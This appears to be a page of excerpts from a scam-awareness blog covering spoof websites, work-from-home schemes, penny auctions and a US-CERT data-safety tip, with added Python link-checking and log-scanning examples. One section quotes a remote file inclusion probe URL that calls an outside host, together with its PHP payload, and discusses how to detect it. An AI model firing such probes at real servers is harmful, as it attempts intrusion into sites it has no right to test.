Websites

Spoof websites bilk Caledonia man out of $30K

A man in Caledonia, Wisconsin thought he was buying a car from a reputable website (autotrader.com) and paying for it using a reputable financial site (amazonpayments.com). It turned out that both sites were so-called ‘spoof sites’ – identical copies of valid websites, used to capture personal information such as credit card numbers and passwords or, as in this case, to make it appear that a bona fide transaction was taking place.

The Porsche Cayman he paid $30,000 for did not show up and by the time he realised, the cash had flown to Romania.

The lesson?

Never trust a link supplied to you from email or a website, especially if it is a financial transaction. Always go independently to websites using your own bookmarks or by typing the URL in. It’s insanely easy to show the ‘correct’ link but to go to a different one when it is clicked. Financial sites always use ‘https’ instead of ‘http’. No exceptions. Look at your online bank URL when you are logged in some time.

Check the address bar of your browser. It’s trying to keep you safe.
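The mismatch between the link that is shown and the link that is followed can be checked mechanically. The following is an added example, not code from this site: it scans the HTML of a message and reports every link whose visible text names one host while its href points at another. The sample message and the example.net / example.org hosts are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Link text that itself looks like a web address, with or without a scheme.
URLISH = re.compile(r"^(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})(?:[/:?#].*)?$", re.I)

# Constructed sample message; the example.net / example.org hosts are placeholders.
SAMPLE_EMAIL = """
<p>Pay at <a href="http://payments.example.net/amazonpayments.com/">https://www.amazonpayments.com</a></p>
<p>Listing: <a href="https://www.autotrader.com/cars/123">www.autotrader.com</a></p>
<p><a href="http://autotrader.com.listing.example.org/">autotrader.com</a></p>
<p><a href="https://www.autotrader.com/help">Help pages</a></p>
"""

def host_of(url):
    """Lower-cased hostname of a URL, ignoring a leading 'www.'."""
    host = (urlsplit(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host

class LinkAuditor(HTMLParser):
    """Records links whose visible text names one host but whose href goes to another."""
    def __init__(self):
        super().__init__()
        self.href, self.text, self.findings = None, [], []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.href, self.text = dict(attrs).get("href") or "", []

    def handle_data(self, data):
        if self.href is not None:
            self.text.append(data)

    def handle_endtag(self, tag):
        if tag != "a" or self.href is None:
            return
        shown = "".join(self.text).strip()
        m = URLISH.match(shown)
        # Only text that claims to be an address can contradict the real target.
        if m and host_of("//" + m.group(1)) != host_of(self.href):
            self.findings.append((shown, self.href))
        self.href = None

def deceptive_links(html):
    """Return [(shown_text, real_href)] for every mismatching link in `html`."""
    auditor = LinkAuditor()
    auditor.feed(html)
    return auditor.findings
```

The third sample link is the lookalike case: the real name appears at the start of the hostname, but the host the browser actually contacts is whatever the name ends with.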

Read More at the Caledonia Patch website (it’s the real one, trust me!)

WORK FROM HOME!!! (yep, it’s yet another scam)

Anyone online or offline has seen the ads by now –

Money Motivated Pros | Team Leaders Needed | Looking for Recruiters | Professionals Needed | Remote Agents Needed | Top Guns Only | Business Development | Marketing Reps | Senior Account Executives |
Promotional Managers | Looking for Talent | Junior Account Executive | Marketing and Sales | We Need Strong Phone Associates – Incoming Calls | Seasoned Reps /Team Leaders | Looking for Experienced Team Builders | Inbound Phone Associates |Sales Openers and Closers Needed Now – All Inbound | Confident Strong Reps for Easy Phone Work | Inbound Sales/Marketing Representatives | Phone Based Sales | Team Leaders Needed – All Calls Incoming

Whether it’s spam, popups, ads on your favorite website, flyers stuffed in your letterbox or even personal solicitation – it’s everywhere and there is a very good reason.

I’m talking about the ‘Free Cash Machine’ or ‘Daily Income Career Network’  (aka hundreds of other names which change daily).

It’s an operation which, while technically not a scam, sails as close to the ‘S’ word as possible and uses every unethical and morally questionable trick in the very same book that scammers use.

How it works
Daily Income Network Video – How it all works (according to them)

This is a very sophisticated operation that strings together every tried and trusted technique (Ponzi, MLM, Affiliate Marketing, Spam, Deceptive Advertising) into one large funnel, with your money at one end and their bank account at the other.

Their advertising is very keen to make out that it costs you nothing (to get started). This alone helps them get past one hurdle: the online job websites will not accept any vacancy that carries an up-front fee. So that means that CareerBuilder, Craigslist, Your-Local-Classifieds and more will be full of the same ad in a different cloak.

Scam Job Listing on CareerBuilder

Part 1 – Trainee
After looking through their training materials, it first appears that the ‘job’ is signing up for trial periods with web-based companies (such as Free Credit Reports, ID Protection, Satellite Dishes etc.). After doing this, the job is to get as many other people as possible to do the same thing. This generates affiliate income, which is where all the $20 bills start appearing. The more of the people you know you spam into signing up for dodgy services, the more money you make.

Asterpix (who they?) vs. Google

Some Background First

A company called Asterpix (www.asterpix.com) have a cool tool (Searchlight) for websites (such as this one!). They analyse the page you are on, include any recent search terms passed in (eg. from Google) and the website you are on, and generate a Tag Cloud of words and phrases that seem to be interesting, by means of search terms or frequency of occurrence or other weighting.

When a user clicks on one of the phrases in the tag cloud, they are taken to a fairly plain looking Google Search Results page with a (Google Adsense) ad block at top and bottom. While the search page is hosted on Asterpix’s website, the Google Adsense account is the original site owner’s.

A visitor clicks on an ad, the revenue goes to the site owner – what could be simpler?

The Problem is ….


Powell Exotic Furniture Website Spoof Scam – PEFURNITURE.NET

Administrative assistant needed by Powell Exotic Furniture,Good pay and flexible hours, see attached pdf for more info or sign up via www.pefurniture.net/careers.php

Here’s a new website spoof scam – take the website of a perfectly respectable, American furniture company – Nichols & Stone and copy it. Then substitute the new name ‘Powell Exotic Furniture’ and register a domain name – PEFURNITURE.NET

Here’s the domain name details  – complete rubbish as usual – created in February, updated today.

complete Domain Name: PEFURNITURE.NET
   Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
   Referral URL: http://www.PublicDomainRegistry.com
   Creation Date: 06-feb-2010
   Last update of whois database: Tue, 11 May 2010 21:47:04 UTC <<<

Registration Service Provided By: HIGH HOSTING ENTERPRISES, INC
Contact: +001.8503682092

Registrant:
    PHYLLIS THOMPSON
    William Ace        (surveyciti@rocketmail.com)
    21 E. Penn St
    Mundeline    IL,60060    US
    Tel. +1.2066664204

Obviously this is a scam. Do not go there or give any of your details – you have been warned.

Swoopo, BidRivals (and other Penny Auction sites) – Are they a Scam?

My answer is ‘Probably Yes‘!

These sites (and there are plenty of copycats) appear to operate as eBay-type auctions, but they have several important differences which people need to be aware of: The main one being, unlike eBay, when the auction ends, it doesn’t!

These are not real, fair auctions like you’d expect – you bid in tiny increments, say a penny – but every penny costs you around 60 cents (or equivalent local currency) and every bid costs money, so the more bids that are made on an item, the more money the ‘house’ gets. Everyone pays, not just the winner, and simple math shows that what the company takes in bids nearly always equals or exceeds the value of the item.

It’s obviously a huge money spinner – a few ordinary goods seem to be going for $5, when in reality they can be paid for many times over by the losing-but-paying other bidders.

PHP Exploit URL foxes Apache

There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press‘. So, can someone clever please tell me why this simple url hangs up a bunch of seemingly dissimilar web servers:

http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?

My banana was once part of a bunch very similar to this one


Here’s the deal – when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obvious hack-attempts is to block the IP address or use .htaccess rewrite rules to send them to an oh-so-friendly ‘go away page‘ :).

In this case, the URL carries a payload that is itself a link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in its entirety here) will, if allowed to run, return the word ‘FeelCoMz’ to the ‘sKriptKiDee’, aka ‘Wanker’ on the sending end.

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

So… it didn’t work, I trapped it and it raised a red flag, but then why, when I try the URL, does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on its back?

Analyzing the url gets me to this reduction of required parts:

* any .php file path.
* any query string that contains an ‘http://’ in it
* must have a file extension such as txt, gif, png etc.
* must have the trailing ‘?’

Any URL with these parts will cause the same problem on an awful lot of famous-name servers, mine included. For example: scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc etc.

For example, in the following link, everything except ‘www.amazon.com’ is made up

http://www.amazon.com/a.php?b=http://c.gif?

but it still exhibits the same behaviour – WTF is going on?

and why, oh why can’t I detect it in my .htaccess file?

First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.

gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it – or even my second best earphones.

Good luck!

_________________________________

Still no replies and it’s still happening…. where have all the gurus gone?
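The request shape reduced above (a query-string parameter whose value is itself an absolute URL, as in the errors.php probe) is what is generally called a remote file inclusion probe, and it can be picked out of an access log. The following is an added example, not Scamdex’s own code: the log lines, client addresses and timestamps are constructed, and it also decodes percent-encoded variants of ‘http://’ that a plain text match would miss.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside an access-log entry: "GET /path?query HTTP/1.1"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself an absolute URL.
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.I)

# Constructed sample log; addresses are from the documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/May/2010:21:47:04 +0000] "GET /errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 512',
    '198.51.100.7 - - [11/May/2010:21:48:10 +0000] "GET /a.php?b=http%3A%2F%2Fc.gif%3F HTTP/1.1" 404 512',
    '203.0.113.5 - - [11/May/2010:21:49:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 9000',
]

def fully_decode(value, rounds=3):
    """Undo up to `rounds` further layers of percent-encoding (http%253A%252F...)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def remote_include_params(target):
    """Return [(name, value)] for query parameters whose value is an absolute URL."""
    hits = []
    # parse_qsl already removes one layer of percent-encoding from each value.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(value)
        if REMOTE_URL.match(value):
            hits.append((name, value))
    return hits

def scan_log(lines):
    """Yield (client_ip, request_target, hits) for each log line carrying such a parameter."""
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        hits = remote_include_params(m.group(1))
        if hits:
            yield line.split(" ", 1)[0], m.group(1), hits
```

A site that legitimately passes URLs in a parameter (a redirect target, say) would need those parameter names allowlisted before alerting on every hit.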

Who or What is BobBear?

In my infrequent callouts to other websites that (like Scamdex) were created out of the blind fury experienced by seeing bad people taking money from good people, I have another site for you to take notice of.

But first, a recap:

When Scamdex started in 2004, there were very few sites about scams and Internet fraud; we felt there was a need to educate people and, using the power of Search Engines, set out to make it easy to check on emails and websites.

Since then, the field has grown – lots of Government-funded sites have sprung up, large Internet organizations have (finally) acknowledged that fraud does happen and now devote precious pages to warning their customers “it’s not our fault, please don’t bother trying to sue us” “there are unscrupulous people out there so please don’t use Western Union to buy Laptops from Nigeria” etc…

But still Scamdex and the many other privately run websites continue in their (often one-manned) struggle against the odds and so to one of these: ‘BobBear’

Bob Bear Website Logo


Bobbear.co.uk is a voluntary, non-profit site dedicated to providing information on fake companies offering part-time, work from home job scams, in particular money mule or money transfer fraud, aka ‘payment transfer agent’ scams and the related reshipping fraud or ‘parcels agent’ scams. They also provide victim advice and support. If you receive a suspect spam offering you a job or find a website offering fraud jobs then please send them (and us) a copy.

Please support them – you know it makes sense!

Cyber Security Tip: Safeguarding Your Data

Cyber Security Tip ST06-008  Safeguarding Your Data

When there are multiple people using your computer and/or you store sensitive personal and work-related data on your computer, it is especially important to take extra security precautions.

Why isn’t “more” better?

Maybe there is an extra software program included with a program you bought. Or perhaps you found a free download online. You may be tempted to install the programs just because you can, or because you think you might use them later. However, even if the source and the software are legitimate, there may be hidden risks. And if other people use your computer, there are additional risks.

These risks become especially important if you use your computer to manage your personal finances (banking, taxes, online bill payment, etc.), store sensitive personal data, or perform work-related activities away from the office. However, there are steps you can take to protect yourself and protect your finances with several invoice tools.

How can you protect both your personal and work-related data?

1. Use and maintain anti-virus software and a firewall – Protect yourself against viruses and Trojan horses that may steal or modify the data on your own computer and leave you vulnerable by using anti-virus software and a firewall (see Understanding Anti-Virus Software and Understanding Firewalls for more information). Make sure to keep your virus definitions up to date.

2. Regularly scan your computer for spyware – Spyware or adware hidden in software programs may affect the performance of your computer and give attackers access to your data. Use a legitimate anti-spyware program to scan your computer and remove any of these files (see Recognizing and Avoiding Spyware for more information). Many anti-virus products have incorporated spyware detection.

3. Keep software up to date – Install software patches so that attackers cannot take advantage of known problems or vulnerabilities (see Understanding Patches for more information). Many operating systems offer automatic updates. If this option is available, you should turn it on.

4. Evaluate your software’s settings – The default settings of most software enable all available functionality. However, attackers may be able to take advantage of this functionality to access your computer. It is especially important to check the settings for software that connects to the internet (browsers, email clients, etc.). Apply the highest level of security available that still gives you the functionality you need.

5. Avoid unused software programs – Do not clutter your computer with unnecessary software programs. If you have programs on your computer that you do not use, consider uninstalling them. In addition to consuming system resources, these programs may contain vulnerabilities that, if not patched, may allow an attacker to access your computer.

6. Consider creating separate user accounts – If there are other people using your computer, you may be worried that someone else may accidentally access, modify, and/or delete your files. Most operating systems (including Windows XP and Vista, Mac OS X, and Linux) give you the option of creating a different user account for each user, and you can set the amount of access and privileges for each account. You may also choose to have separate accounts for your work and personal purposes. While this approach will not completely isolate each area, it does offer some additional protection. However, it will not protect your computer against vulnerabilities that give an attacker administrative privileges. Ideally, you will have separate computers for work and personal use; this will offer a different type of protection.

7. Establish guidelines for computer use – If there are multiple people using your computer, especially children, make sure they understand how to use the computer and internet safely. Setting boundaries and guidelines will help to protect your data (see Keeping Children Safe Online for more information).

8. Use passwords and encrypt sensitive files – Passwords and other security features add layers of protection if used appropriately (see Choosing and Protecting Passwords and Supplementing Passwords for more information). By encrypting files, you ensure that unauthorized people can’t view data even if they can physically access it. You may also want to consider options for full disk encryption, which prevents a thief from even starting your laptop without a passphrase. When you use encryption, it is important to remember your passwords and passphrases; if you forget or lose them, you may lose your data.

9. Follow corporate policies for handling and storing work-related information – If you use your computer for work-related purposes, make sure to follow any corporate policies for handling and storing the information. These policies were likely established to protect proprietary information and customer data, as well as to protect you and the company from liability. Even if it is not explicitly stated in your corporate policy, you should avoid allowing other people, including family members, to use a computer that contains corporate data.

10. Dispose of sensitive information properly – Simply deleting a file does not completely erase it. To ensure that an attacker cannot access these files, make sure that you adequately erase sensitive files (see Effectively Erasing Files for more information).

11. Follow good security habits – Review other security tips for ways to protect yourself and your data.
_________________________________________________________________
Author: Mindi McDowell   Produced 2006 by US-CERT, a government organization.
<http://www.us-cert.gov/cas/tips/ST06-008.html>